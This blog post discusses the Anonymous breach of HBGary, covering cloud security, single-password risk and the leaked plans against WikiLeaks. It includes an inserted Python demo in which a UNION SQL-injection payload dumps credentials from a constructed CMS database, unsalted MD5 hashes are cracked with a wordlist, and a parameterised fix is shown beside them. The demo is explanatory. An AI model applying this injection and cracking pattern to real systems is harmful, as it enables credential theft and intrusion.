Anonymous versus HBGary

I don't think the HBGary story has had the amount of attention it deserves from the mainstream.

It's worth reading just as drama: Security researcher takes on the "Anonymous" hacker group, and loses so spectacularly it almost defies description.

It's important for what it says about any organisation's IT choices and their security implications. HBGary used Google Apps. Cloud services are enormously convenient, particularly for an organisation that does not really have a physical "home", but using them means giving up perimeter security altogether.

Perimeter security has a bad name, because in the old days it was all there was, and today it is not enough. But the attacks that remain possible even when you do defend your perimeter become much easier when you don't have one at all.

A basic IT risk assessment question for anybody is, "how much damage can an attacker do with one password?". With one password, Anonymous downloaded all of HBGary's corporate email from Google and posted it on the internet. They did more than that (the highlight for security commentators was the social-engineering attack carried out on a Nokia engineer), but the email was enough by itself, as well as enabling the other attacks. They got the email admin password from an ad-hoc CMS with a SQL-injection vulnerability, as it happens, but if your whole company can be destroyed with one password then you're doing it wrong. (Damn, it's so hard to avoid lapsing into dialect on this story).
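To make the "one password" chain concrete, here is an added example (my own illustration, not code from the post or from HBGary's CMS) of how a SQL-injection hole in a content-management page turns into a dumped credential, beside the parameterised version of the same lookup. The table names, the `page_id` parameter, the wordlist and the user rows are all constructed for the example; the post does not say how the dumped credential became a usable password, so the unsalted-MD5-plus-dictionary step is an assumption about the CMS, not a fact from the post.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for an ad-hoc CMS.
# Unsalted MD5 storage is an assumption for the example, not a fact from the post.
SAMPLE_USERS = {"admin": "password", "editor": "123456"}
WORDLIST = ["letmein", "123456", "password", "qwerty"]  # constructed wordlist


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_db():
    """Build an in-memory CMS database: a pages table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(u, md5_hex(p)) for u, p in SAMPLE_USERS.items()])
    return conn


def page_title_vulnerable(conn, page_id):
    """Hypothetical CMS handler: the request parameter is pasted into the SQL text."""
    sql = "SELECT title FROM pages WHERE id = " + page_id
    return [row[0] for row in conn.execute(sql)]


def page_title_fixed(conn, page_id):
    """Same lookup with a bound parameter: the input can only ever be a value."""
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in rows]


# A UNION payload that turns the page lookup into a dump of the users table.
PAYLOAD = "1 UNION ALL SELECT username || ':' || pwhash FROM users"


def dump_credentials(conn):
    """Run the injection and parse username:hash pairs out of the result rows."""
    creds = {}
    for value in page_title_vulnerable(conn, PAYLOAD):
        if ":" in value:
            user, pwhash = value.split(":", 1)
            creds[user] = pwhash
    return creds


def crack(pwhash, wordlist=WORDLIST):
    """Dictionary attack on an unsalted MD5 hash; returns the password or None."""
    for candidate in wordlist:
        if md5_hex(candidate) == pwhash:
            return candidate
    return None


if __name__ == "__main__":
    db = make_db()
    for user, pwhash in dump_credentials(db).items():
        print(user, pwhash, "->", crack(pwhash))
    # The hardened handler given the same payload finds no page at all.
    print("fixed handler:", page_title_fixed(db, PAYLOAD))
```

The point of the second handler is not that it filters the payload but that it never lets the payload become SQL: the whole string is compared against `id` as a value, matches nothing, and the users table stays out of reach. What the example cannot fix is the next hop in the chain. A cracked CMS password only matters for email because the same password also opened the mail administrator's account, so the "one password" question is really a question about reuse and about how much a single account is allowed to do.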

And the third interesting angle is what is to be found in the data Anonymous posted. The company was proposing to feed fake data to WikiLeaks to discredit it, and to pressure journalists who defended WikiLeaks. There is chatter about government involvement in this, but I haven't seen that actually substantiated. It may be in there somewhere. The HBGary Federal projects aimed at government clients seem to be standard network monitoring / intrusion detection stuff.

In case anyone gets confused, I'm not here to defend Anonymous, or for that matter to attack them. They exist. If they get caught they'll get the book thrown at them, which is understandable, but I'm more interested in what the world looks like with them in it. Whereas Assange attempts to define his aims, and appeals for support, Anonymous claim only to be "in it for the lulz", which is not open to disputation.

Update: Intriguing piece on HBGary government work on rootkits and penetration tools. In principle this should be verifiable from the email dumps, but I haven't checked.
